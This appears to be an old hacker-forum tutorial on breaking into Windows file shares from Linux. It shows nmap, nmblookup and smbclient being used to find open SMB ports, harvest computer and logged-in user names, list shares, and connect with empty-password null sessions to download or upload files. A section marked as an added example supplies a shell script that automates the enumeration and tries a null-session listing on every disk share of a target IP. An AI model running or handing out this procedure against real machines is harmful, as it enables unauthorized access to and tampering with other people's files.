netbios hacking with samba
hope you enjoyed my last tut on netbios hacking from windows. now i thought linux users would be whinging because they can't be elite_ha><oars as well, so here it is: netbios hacking for linux.
the first step is to get samba, the open-source implementation of the SMB/CIFS protocol (windows file and printer sharing) for unix. it's available for download at
http://www.samba.org install it, read the docs, etc. the two tools used below, nmblookup and smbclient, come with it.
now, as on windows, you need to make sure the target actually has netbios/smb listening, so we use nmap. i'm sure most of you have nmap and know how to use it, but just in case, get it and read the docs at
http://www.insecure.org/nmap/
one caveat: windows 2000 and later also serve smb straight over tcp on port 445, so scan for both ports (nmap -p 139,445 ipaddress) rather than relying on whatever the default port list happens to include.
Code:
[rioter@7337 rioter]$ nmap xxx.xxx.xxx.xxx
Starting nmap V. 2.54BETA22 ( www.insecure.org/nmap/ )
Interesting ports on (192.168.0.44):
(The 1541 ports scanned but not shown below are in state: closed)
Port State Service
139/tcp open netbios-ssn
Nmap run completed -- 1 IP address (1 host up) scanned in 6 seconds
those are the results from my win98 box; as you can see, the netbios session service (139/tcp) is wide open. next we ask the box for its netbios name table, which tells us its computer name, its workgroup, and who is logged in at the moment. for that we use
nmblookup -A ipaddress
Code:
[rioter@7337 rioter]$ nmblookup -A xxx.xxx.xxx.xxx
Looking up status of 192.168.0.44
        computername    <00> -         B <ACTIVE>
        workgroup       <00> - <GROUP> B <ACTIVE>
        computername    <03> -         B <ACTIVE>
        computername    <20> -         B <ACTIVE>
        workgroup       <1e> - <GROUP> B <ACTIVE>
        userloggedin    <03> -         B <ACTIVE>
the number in <> is the suffix that says which service registered each name. <00> on a unique name is the workstation service, i.e. the computer name; the <00> and <1e> entries marked <GROUP> are the workgroup. <20> is the file server service, so a box that registers <20> is sharing something and is the one you can try to connect to; if there is no <20> entry there is nothing to connect to. <03> is the messenger service, which gets registered both for the computer name and for the user currently logged in, and that is how you get their username.
now to list the shares the computer you're interested in has, we use
smbclient -L computername -I ipaddress
it will ask for a password. unless the box is win2k with a password set on it, you should just be able to hit enter at the prompt and it should let you through, like it did on my computer (win9x share-level boxes and anything that allows anonymous/null sessions will answer an empty password). if you're scripting it, pass -N and smbclient skips the prompt and sends an empty password for you.
Code:
[rioter@7337 rioter]$ smbclient -Lcomputername
added interface ip=xxxxxxxx bcast=192.168.0.255 nmask=255.255.255.0
added interface ip=192.168.127.1 bcast=192.168.127.255 nmask=255.255.255.0
added interface ip=192.168.186.1 bcast=192.168.186.255 nmask=255.255.255.0
Got a positive name query response from xxxxxxx ( xxxxxxxx )
Password:
        Sharename      Type      Comment
        ---------      ----      -------
        I              Disk
        J              Disk
        G              Disk
        H              Disk
        F              Disk
        D              Disk
        E              Disk
        C              Disk
        EPSON          Printer
        IPC$           IPC       Remote Inter Process Communication

        Server               Comment
        ---------            -------
        xxxxxxx
        xxxxxxx              xxxx

        Workgroup            Master
        ---------            -------
        xxx                  xxxxxxxxx
ok, now you're ready to connect to a share. we use smbclient again, this time with a share name (on this box the shares are just drive letters) instead of -L, and -N so it doesn't stop to ask for a password:
smbclient //computername/sharename -I ipaddress -N
pick one of the Disk shares from the list; IPC$ is for remote procedure calls, not files, and you can't browse a printer. if the connection is refused, the share has a password on it or the box doesn't allow anonymous access, and you'll need real credentials (-U username).
Code:
[jared@7337 jared]$ smbclient //xxxxxxx/C -I xxxxxxxx -N
added interface ip=xxxxxxxx bcast=192.168.0.255 nmask=255.255.255.0
added interface ip=192.168.127.1 bcast=192.168.127.255 nmask=255.255.255.0
added interface ip=192.168.186.1 bcast=192.168.186.255 nmask=255.255.255.0
smb: \>
if your screen now looks like that, you're in. the smb: \> prompt takes normal dos-style commands, ie dir, cd, etc., and most ftp-style commands work too. the ones you'll use most are get and put: get filename.exe will download that file into the local directory you started smbclient from (lcd changes it), and put uploads one, which only works if the share is writable. help at the prompt lists the rest.
to exit just type exit
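here's the whole procedure in one shell script, as an added example (it is not part of RiOtEr's post and not samba's own code). it runs the nmap port check, pulls the <20> server name and the logged-in user out of nmblookup -A, keeps only the Disk shares from smbclient -L, and tries a null-session dir on each. it assumes nmap, nmblookup and smbclient are on your PATH; the WIN98BOX/RIOTER sample output embedded in it is made up, in samba's output layout, so the parsing can be tested without a target on the wire.

```shell
#!/bin/sh
# Added example (not RiOtEr's code): the nmap -> nmblookup -> smbclient steps
# glued together as one enumeration pass. Assumes nmap, nmblookup and smbclient
# are on PATH. The SAMPLE_* blobs are constructed output in Samba's layout so the
# parsers can be exercised offline.

# nmblookup -A prints one name per line, fields:
#   NAME <suffix> - [<GROUP>] B <ACTIVE>
# so $2 is the suffix and $4 is "<GROUP>" only for group names.
SAMPLE_NMBLOOKUP='Looking up status of 192.168.0.44
	WIN98BOX        <00> -         B <ACTIVE>
	WORKGROUP       <00> - <GROUP> B <ACTIVE>
	WIN98BOX        <03> -         B <ACTIVE>
	WIN98BOX        <20> -         B <ACTIVE>
	WORKGROUP       <1e> - <GROUP> B <ACTIVE>
	RIOTER          <03> -         B <ACTIVE>'

# smbclient -L: the share table runs from the "Sharename Type Comment" header
# to the first blank line.
SAMPLE_SHARELIST='	Sharename      Type      Comment
	---------      ----      -------
	C              Disk
	D              Disk
	EPSON          Printer
	IPC$           IPC       Remote Inter Process Communication

	Server               Comment
	---------            -------
	WIN98BOX'

# Name registered with the <20> (file server) suffix, i.e. the name to use in
# //name/share. Empty output means the box is not serving shares at all.
server_name() {
    awk '$2 == "<20>" && $4 != "<GROUP>" { print $1; exit }'
}

# Unique <03> (messenger) names other than the computer name: the logged-in user(s).
logged_in_users() {
    awk '$2 == "<00>" && $4 != "<GROUP>" { host = $1 }
         $2 == "<03>" && $4 != "<GROUP>" { seen[$1] = 1 }
         END { for (n in seen) if (n != host) print n }' | sort
}

# Disk shares from smbclient -L; printers and IPC$ are skipped since you cannot
# browse them. Share names containing spaces would need a smarter split than awk's.
disk_shares() {
    awk '/Sharename[ \t]+Type[ \t]+Comment/ { inlist = 1; next }
         inlist && /^[ \t]*-+[ \t]+-+/ { next }
         inlist && NF == 0 { inlist = 0 }
         inlist && $2 == "Disk" { print $1 }'
}

# Live run against one IP: port check, name table, share list, then a null-session
# "dir" on every disk share so you can see which ones actually open.
enumerate() {
    ip=$1
    if ! nmap -p 139,445 "$ip" | grep -Eq '^(139|445)/tcp +open'; then
        echo "$ip: no smb port open" >&2
        return 1
    fi
    nmb=$(nmblookup -A "$ip")
    name=$(printf '%s\n' "$nmb" | server_name)
    if [ -z "$name" ]; then
        echo "$ip: no <20> file server name registered" >&2
        return 1
    fi
    echo "server: $name   users: $(printf '%s\n' "$nmb" | logged_in_users | tr '\n' ' ')"
    smbclient -L "$name" -I "$ip" -N | disk_shares | while read -r share; do
        echo "== //$name/$share"
        smbclient "//$name/$share" -I "$ip" -N -c 'dir' 2>&1 | head -n 20
    done
}

if [ $# -gt 0 ]; then
    enumerate "$1"
fi
```

run it as sh enum.sh 192.168.0.44 (the file name is whatever you saved it as). a share whose dir comes back with a tree connect error is password-protected or denies anonymous access; for those, add -U username to the smbclient line and it will prompt you.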
that's it, easy ain't it.
to see the other commands and options the programs we used give you, just do man programname.
RiOtEr
well, i have to thank negative for the formatting on the last one, but also for being a bitch today.
and this isn't a desperate bid to get antipoints. as jp said, we take take take take,
so i thought i would give give give.